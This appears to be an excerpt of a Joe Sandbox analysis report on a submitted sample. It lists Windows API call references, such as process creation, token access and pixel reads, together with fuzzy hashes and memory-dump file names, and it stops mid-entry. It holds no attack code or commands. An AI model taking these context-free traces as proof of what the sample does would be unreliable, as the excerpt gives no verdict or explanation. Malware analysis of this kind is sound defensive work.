• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 1c6a61b58711d0988603ad84656515a5d5139816513c5ea14db2022c3e5a6fb7
• Instruction ID: 97d337a706220b3cf27ed42c3592e77ee5974ba210ee2e8595c6d84a3076dac3
• Opcode Fuzzy Hash: 1c6a61b58711d0988603ad84656515a5d5139816513c5ea14db2022c3e5a6fb7
• Instruction Fuzzy Hash: 76112A7A900218FFDB11DFA9C985EADBBB4FB08710F204091EA14B7295D771AE11DB94
APIs
  • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00EDB5A5
• GetClientRect.USER32(?,?), ref: 00F3E69A
• GetCursorPos.USER32(?), ref: 00F3E6A4
• ScreenToClient.USER32(?,?), ref: 00F3E6AF
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 26723917aa934a451a6535e3a7b6081489ab95e224291def5baa0601166010c8
• Instruction ID: c061b3c29035e146ea42fe61c8134dde1e403f0e608e5402ec992b7ff8c3c8f2
• Opcode Fuzzy Hash: 26723917aa934a451a6535e3a7b6081489ab95e224291def5baa0601166010c8
• Instruction Fuzzy Hash: 0211F535900029FBDF109F94E8469EE77B9EF19314F110456E941A6241E734AA92EBA1
APIs
• GetCurrentThreadId.KERNEL32 ref: 00F07352
• MessageBoxW.USER32(?,?,?,?), ref: 00F07385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F0739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F073A2
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 69af3936247c48ed1e5ae289a895c6733de6f5fb653ad744d83aeef91b972b49
• Instruction ID: 2d1606e2b951435d0c90aa15a3f4ab76aec4453aac629614bfab1e3fae53060b
• Opcode Fuzzy Hash: 69af3936247c48ed1e5ae289a895c6733de6f5fb653ad744d83aeef91b972b49
• Instruction Fuzzy Hash: F1110476E04208BFD711AFA8DC05AEE7BADAB45320F044395FD21D32A1D6709E00B7A1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00EDD1BA
• GetStockObject.GDI32(00000011), ref: 00EDD1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 00EDD1D8
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 2d9a2cdb77e432a4603312a90adbae60f1a9e57e17f0b4ce8c469a08c366582d
• Instruction ID: e3c308e4c244d948c81deb4dcb7a31045f0e89377c0366bafc0ddaa99ecb4880
• Opcode Fuzzy Hash: 2d9a2cdb77e432a4603312a90adbae60f1a9e57e17f0b4ce8c469a08c366582d
• Instruction Fuzzy Hash: A811ADB210650DBFEF124FA09C50EEABB6DFF19368F041102FE14A2250C7319C61ABA0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                                                                      • Instruction ID: dd95914d55d1384eac4c6fad2ffb165bf060513e9ff97fb7929a4337f7a02c1d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E9014C7604014EBBCF125E84DC018EE3F63BB28354B589455FF2969075D336CAB1AB81
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7A0D: __getptd_noexit.LIBCMT ref: 00EE7A0E
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE748F
                                                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00EE74AC
                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00EE74BF
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(011468D0), ref: 00EE74D7
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2704283638-0
                                                                                                                                                                                                                                                      • Opcode ID: d60ee41d20a17917b3fa0629ce4ac99733ad4017609ff50ed20f75f1741919ad
                                                                                                                                                                                                                                                      • Instruction ID: 0640850f1170f9335fc15d3233a4fced69999fae37b4cf3ba0bfd745c23a59aa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d60ee41d20a17917b3fa0629ce4ac99733ad4017609ff50ed20f75f1741919ad
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7601D63190576D97D722AF66940575DBBA0BF04718F155005F8ACB76C0C7305941EFD3
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE7AD8
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: __mtinitlocknum.LIBCMT ref: 00EE7D06
                                                                                                                                                                                                                                                        • Part of subcall function 00EE7CF4: EnterCriticalSection.KERNEL32(00000000,?,00EE7ADD,0000000D), ref: 00EE7D1F
                                                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 00EE7AE5
                                                                                                                                                                                                                                                      • __lock.LIBCMT ref: 00EE7AF9
                                                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 00EE7B17
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1687444384-0
                                                                                                                                                                                                                                                      • Opcode ID: 5c6bd53e7124f9fe54fe0d5735e9c5447e12d23e4e492ce375ee3e028dad4d02
                                                                                                                                                                                                                                                      • Instruction ID: 378b8ccf2cea6ecc6b98066fcbe0de78fc070a34a008b74d657114e0c98d2302
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c6bd53e7124f9fe54fe0d5735e9c5447e12d23e4e492ce375ee3e028dad4d02
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A016D71404B48EFD730DF76D90574ABBF0AF54325F20990EA4DAA72A1CBB0A680DB02
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2E33D
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F2E34C
                                                                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F83D00,00F83D44), ref: 00F2E37B
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 00F2E38D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3277943733-0
                                                                                                                                                                                                                                                      • Opcode ID: bef57e84efae032b60c75a9bcb7d176db390eb01f4b31a4cd682d5f770621706
                                                                                                                                                                                                                                                      • Instruction ID: 5051bdc9f97584b2088221fa4c7df2f1323a8f396a466fae847c709b8d611c36
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bef57e84efae032b60c75a9bcb7d176db390eb01f4b31a4cd682d5f770621706
• Instruction Fuzzy Hash: 7BF05EF254031CBBE6106BA1AC45FB77E9CDB05F54F014421FE08E61B2D3B59E00A7A8

APIs
  • Part of subcall function 00EDAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00EDAFE3
  • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDAFF2
  • Part of subcall function 00EDAF83: BeginPath.GDI32(?), ref: 00EDB009
  • Part of subcall function 00EDAF83: SelectObject.GDI32(?,00000000), ref: 00EDB033
• MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F2EA8E
• LineTo.GDI32(00000000,?,?), ref: 00F2EA9B
• EndPath.GDI32(00000000), ref: 00F2EAAB
• StrokePath.GDI32(00000000), ref: 00F2EAB9
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
• String ID:
• API String ID: 1539411459-0
• Opcode ID: 8e5ab274ae8cdec515c65cefd8c1a1a960ea6b29664fc696c3b0d75953deee82
• Instruction ID: 749f99dde684baea8d015d012199f099ef49732ef4063998653a612f572bc245
• Opcode Fuzzy Hash: 8e5ab274ae8cdec515c65cefd8c1a1a960ea6b29664fc696c3b0d75953deee82
• Instruction Fuzzy Hash: A6F0E23100526CBBDB129FA8AC0EFCE3F19AF26320F184201FE01610E183B85652EB95

APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00EFC84A
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00EFC85D
• GetCurrentThreadId.KERNEL32 ref: 00EFC864
• AttachThreadInput.USER32(00000000), ref: 00EFC86B
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
• String ID:
• API String ID: 2710830443-0
• Opcode ID: 8757013430b9e914af2b8928b7d899f462e614a1a6116e1a2d523ca4cf30538b
• Instruction ID: 08f310f98a30694fd857e34e984c96fb0c95add121bf4ffce3ae80ef1ad03a06
• Opcode Fuzzy Hash: 8757013430b9e914af2b8928b7d899f462e614a1a6116e1a2d523ca4cf30538b
• Instruction Fuzzy Hash: 3EE06D7514126CBAEB201BA2DC0DEEB7F1CEF267A1F508421BA0D94460C7B1D580EBE0

APIs
• GetCurrentThread.KERNEL32 ref: 00EFB0D6
• OpenThreadToken.ADVAPI32(00000000,?,?,?,00EFAC9D), ref: 00EFB0DD
• GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EFAC9D), ref: 00EFB0EA
• OpenProcessToken.ADVAPI32(00000000,?,?,?,00EFAC9D), ref: 00EFB0F1
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CurrentOpenProcessThreadToken
• String ID:
• API String ID: 3974789173-0
• Opcode ID: 13dfe4227de59b111df18be3c2fa653a126c6a861fcb60b98e436e5ebc263e44
• Instruction ID: 759d4af9f9cdad6697bef2e498f36198642af60e5a9a9e8ec537caef8672d8db
• Opcode Fuzzy Hash: 13dfe4227de59b111df18be3c2fa653a126c6a861fcb60b98e436e5ebc263e44
• Instruction Fuzzy Hash: 45E08636701215DBD7201FB59C0CB573BA8EF66795F018818FB41D6040EB348441D760

APIs
• GetSysColor.USER32(00000008), ref: 00EDB496
• SetTextColor.GDI32(?,000000FF), ref: 00EDB4A0
• SetBkMode.GDI32(?,00000001), ref: 00EDB4B5
• GetStockObject.GDI32(00000005), ref: 00EDB4BD
• GetWindowDC.USER32(?,00000000), ref: 00F3DE2B
• GetPixel.GDI32(00000000,00000000,00000000), ref: 00F3DE38
• GetPixel.GDI32(00000000,?,00000000), ref: 00F3DE51
• GetPixel.GDI32(00000000,00000000,?), ref: 00F3DE6A
• GetPixel.GDI32(00000000,?,?), ref: 00F3DE8A
• ReleaseDC.USER32(?,00000000), ref: 00F3DE95
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
• String ID:
• API String ID: 1946975507-0
• Opcode ID: e2ba70228796e9a2c5d0eb40ce1724b2f3bbfad37a74f24455ea9bc279735823
• Instruction ID: 86e9ed8934e5c3b033c1e30d5b2bd105ee6999160a2fcd9f2f45f4fbf83b80b4
• Opcode Fuzzy Hash: e2ba70228796e9a2c5d0eb40ce1724b2f3bbfad37a74f24455ea9bc279735823
• Instruction Fuzzy Hash: A2E0ED35500284AAEB215B64BC09BD83F11AB66339F14C666FEBA980E2D7714581EB11

APIs
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00EFB2DF
• UnloadUserProfile.USERENV(?,?), ref: 00EFB2EB
• CloseHandle.KERNEL32(?), ref: 00EFB2F4
• CloseHandle.KERNEL32(?), ref: 00EFB2FC
  • Part of subcall function 00EFAB24: GetProcessHeap.KERNEL32(00000000,?,00EFA848), ref: 00EFAB2B
  • Part of subcall function 00EFAB24: HeapFree.KERNEL32(00000000), ref: 00EFAB32
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 146765662-0
                                                                                                                                                                                                                                                      • Opcode ID: 4ef09a2b695dd03b37b170acfabd0113f401c3583be8724fb53d93849bd37950
                                                                                                                                                                                                                                                      • Instruction ID: 7164a86178957edb77d282422de9174517f3ddfb9dce4d1542d9f30317ffae75
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ef09a2b695dd03b37b170acfabd0113f401c3583be8724fb53d93849bd37950
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92E0E63E104009BFCB022F95DC08869FFB6FF997213108221FA1581575CB329471FB51
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 418759380c82da85c4c579eeb19c4b14e72763ef3a815ee411f8ae0df0f05d45
                                                                                                                                                                                                                                                      • Instruction ID: d12c7d5f16118581de70a1e280dad5cad6b0789e2a0a6d0bb6ff97f70d7731d2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 418759380c82da85c4c579eeb19c4b14e72763ef3a815ee411f8ae0df0f05d45
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6AE04FB9100208EFDB015F70CC4C66E7BA8EF5C350F12D80AFD5A97310CB749841AB40
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2889604237-0
                                                                                                                                                                                                                                                      • Opcode ID: 0f6ee4590a9666a37ba6dec626c3b70bbd741478df9a3532995afa38ac10d976
                                                                                                                                                                                                                                                      • Instruction ID: 7e2b7f672b285a3e196859d5af8467f19fa06db9bdd134199abd67e8b7c78eb8
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f6ee4590a9666a37ba6dec626c3b70bbd741478df9a3532995afa38ac10d976
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BFE04FB9500208EFDB015F70CC4866D7BA8EB5D350F12940AFD5A97310CB7998019B00
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00EFDEAA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
